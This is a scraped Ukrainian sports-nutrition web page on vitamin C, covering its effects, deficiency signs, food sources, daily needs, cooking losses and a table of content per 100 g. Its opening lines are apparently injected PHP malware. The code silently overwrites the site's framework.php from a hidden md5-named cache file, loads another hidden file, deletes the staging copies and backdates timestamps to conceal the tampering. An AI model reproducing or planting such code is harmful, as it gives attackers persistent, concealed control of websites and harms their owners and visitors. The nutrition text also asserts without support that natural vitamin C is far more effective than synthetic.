$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Вітамін С | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Вітамін С

Вітамін С (аскорбінова кислота)

Вітамін С підвищує захисні сили організму, обмежує можливість захворювань дихальних шляхів, поліпшує еластичність судин (нормалізує проникність капілярів). Вітамін С має сприятливу дію на функції центральної нервової системи, стимулює діяльність ендокринних залоз, сприяє кращому засвоєнню заліза й нормальному кровотворенню, перешкоджає утворення канцерогенів. Більші дози вітаміну С корисні для хворих цукровим діабетом, запеклих курців, жінок, що користуються протизаплідними препаратами, для людей похилого віку зі зниженою здатністю травного тракту засвоювати вітаміни. Недолік вітаміну С проявляється у швидкій стомлюваності, кровоточивості ясен, у загальному зниженні стійкості організму проти інфекцій, при задавненому гіповітамінозі. Крім цього може з'явитися цинга, для якої характерні розпушення, набрякання й кровоточивість ясен і випадання зубів, дрібні підшкірні крововиливи. При передозуванні можливі порушення функції печінки й підшлункової залози.

Вітамін С міститься у свіжих рослинах: шипшині, кизилі, чорній смородині, горобині, обліписі, цитрусових плодах, червоному перці, хроні, петрушці, зеленій цибулі, кропі, кресс- салаті, червоно качановій капусті, картоплі, звичайній капусті. У лікарських рослинах: кропиві, любисток, у лісових плодах. Оптимальна потреба у вітаміні С для дорослої людини 55 - 108 мг, вагітних, що годують грудьми жінок - 70-80 мг, дітей першого року життя - 30-40 мг. Вітамін С дуже нестійкий. Він розкладається при високій температурі, при зіткненні з металами, при довгому вимочуванні овочів переходить у воду, швидко окисляється. При зберіганні овочів, фруктів і ягід вміст вітаміну C швидко зменшується. Вже через 2 - 3 місяця зберігання в більшості рослинних продуктів вітамін С наполовину руйнується. У свіжій і квашеній капусті в зимовий період зберігається більше вітаміну С, ніж в інших овочах і фруктах - до 35%. Ще більше руйнується при кулінарній обробці, особливо при жаренні й варінні - до 90%. Наприклад, при варінні очищеної картоплі, зануреної в холодну воду, втрачається 30% - 50% вітаміну, а в гарячій воді до 25% - 30%, при варінні в супі - 50%. Для більшого збереження вітаміну С городину для варіння слід занурювати в киплячу воду. Вітамін С легко переходить у воду, тому варіння картоплі в шкірці скорочує втрати вітаміну С удвічі в порівнянні з варінням очищеної картоплі. Людина, на відміну від переважної більшості тварин, не здатна синтезувати вітамін С і вся необхідна кількість його одержується з їжею, головним чином з овочами, фруктами і ягодами. В організмі вітамін не накопичується. Вітамін С із природних джерел діє на багато ефективніше, ніж синтетичний. Вміст вітаміну С в деяких овочах, плодах і ягодах (на 100 г їстівної частини продукту):

Вміст вітаміну С у продуктах харчування

Продукт

Вміст вітаміну, мг

Продукт

Вміст вітаміну, мг

Буряк

10

Капуста білокачанна

45

Морква

5

Шипшина (суха)

1200

Груша

5

Чорна смородина

200

Айва

23

Апельсини

60

Персики

10

Лимони

40

Гранат

4

Брусниця

15

Черешня темна

15

Клюква

15

Малина

25

Чорноплодна горобина

15

Суниця

60

Агрус

30

Вишня

15

Щавель

43

Слива

10

Шпинат

55

Виноград (чорний)

6

Кріп

100

Яблука зимові

16

Петрушка (зелень)

150

Картопля

20

Селера (зелень)

38


 
Спортивне харчування Вітамін С